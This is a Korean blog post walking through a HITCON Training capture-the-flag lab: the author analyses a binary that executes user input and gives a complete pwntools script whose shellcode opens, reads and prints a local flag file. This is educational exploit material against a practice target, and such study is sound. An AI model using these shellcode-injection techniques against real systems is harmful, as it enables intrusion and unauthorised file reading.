1. 시작전에...
이번에 HICON Training을 CodeByO와 같이 풀어보기로했습니다. 저는 짝수번을 맡기로 하였고, 풀이 내용을 블로깅 할 예정입니다.
pwntools의 shellcraft를 이용하면 각 아키텍쳐(x86, amd64, arm, mips, ...)에 맞는 쉘코드를 손쉽게 만들어 사용할 수 있습니다.
낮은 번호의 문제라서 그런지 어떤 지식이 필요했다기 보다는 shellcode를 만들 수 있는 지를 확인 하는 것 같았습니다. 사실 풀이랄 것도 별로 없어요ㅠ
2. 분석
먼저 file명령어를 이용해서 어떤 파일인지 살펴보니까 ELF 32bit실행파일입니다.
실행파일이니까 실행을 한번 해봅시다.
실행하면 "Give my your shellcode:" 가 프린트 되고, 입력을 받습니다.
hello 라고 입력을 했더니 세그먼트 폴트가 나고 말았네요.
ida를 이용해서 디컴파일을 해보면
간단하게 메인 함수가 있습니다. 살펴보면 위에서 직접 실행하면서 봤던 Give my... 문자열을 print해준 후에 shellcode에 입력 값을 200byte넣어 준 후 아래에서 실행 하는 것 같습니다.
gdb(peda)로 한번 열어보겠습니다.
main+41 ~ 53까지를 보면 0xc8, 0x804a060, 0x0을 차례대로 스택에 push한 후 read함수를 호출하고 있습니다. 0xc8은 10진수로 200으로
ida에서 본 read(0, &shellcode, 200u); 부분이 되겠네요. 그리고 main+61, 66을보면 0x804a060을 eax에 넣고 call eax를 하고 있습니다.
우리가 Give my... 이후에 입력한 값은 0x804a060에 저장이 되고 결과적으로 main+66에서 call하게 되는 것이지요
따라서 Give my.. 이후에 적당한 쉘코드를 넣어주면 그 쉘코드가 실행이 될 것으로 보입니다.
문제에서 의도한 것은 원래 서버에 있는 flag를 읽는 것이지만, 현재 HITCON Training의 서버가 죽은 것으로 보여 local 환경에서 테스트 해보기로 합시다.
3. exploit
============solv.py============
from pwn import *
p = process('./orw.bin')
context(arch='i386', os='linux')
shellcode = ''
shellcode += shellcraft.pushstr('flag')
shellcode += shellcraft.open('esp', 0, 0)
shellcode += shellcraft.read('eax', 'esp', 100)
shellcode += shellcraft.write(1, 'esp', 100)
#log.info(shellcode)
p.recvuntil('Give my your shellcode:')
p.send(asm(shellcode))
log.success(p.recvline())
==============================
쉘코드를 만들 내용을 shellcraft를 이용해서 만듭니다.shellcode += shellcraft.pushstr('flag') #open함수의 인자로 사용하기 위해 파일명을 pushshellcode += shellcraft.open('esp', 0, 0) #스택 최 상단에는 파일명이 있으므로, esp를 이용해서 open함수를 callshellcode += shellcraft.read('eax', 'esp', 100) #open함수 호출 후 eax에 fd가 반환되므로 해당 fd에서 100byte만큼 읽어서 esp에 저장shellcode += shellcraft.write(1, 'esp', 100) #write함수의 fd에 표준출력을 주어서 파일 내용을 출력
local에서 테스트하기 위해 생한 flag파일이 정상적으로 읽혀 출력되는 것을 확인 할 수 있습니다.
[추가] pwnable.kr 의 Toddler`s Bottle에 있는 asm문제가 유사하니 풀어보시는 것을 추천드립니다.
'Study > Pwnable' 카테고리의 다른 글
| [HITCON Training] lab6 / Stack migration, Stack pivoting (0) | 2017.12.15 |
|---|---|
| [HITCON Training] lab4 / return to library (0) | 2017.11.29 |
| NX(No eXcutable) / ROP (1) | 2017.09.29 |
| pwnable.kr / input / pwntools (0) | 2017.08.01 |
| pwnable.kr passcode (5) | 2017.07.31 |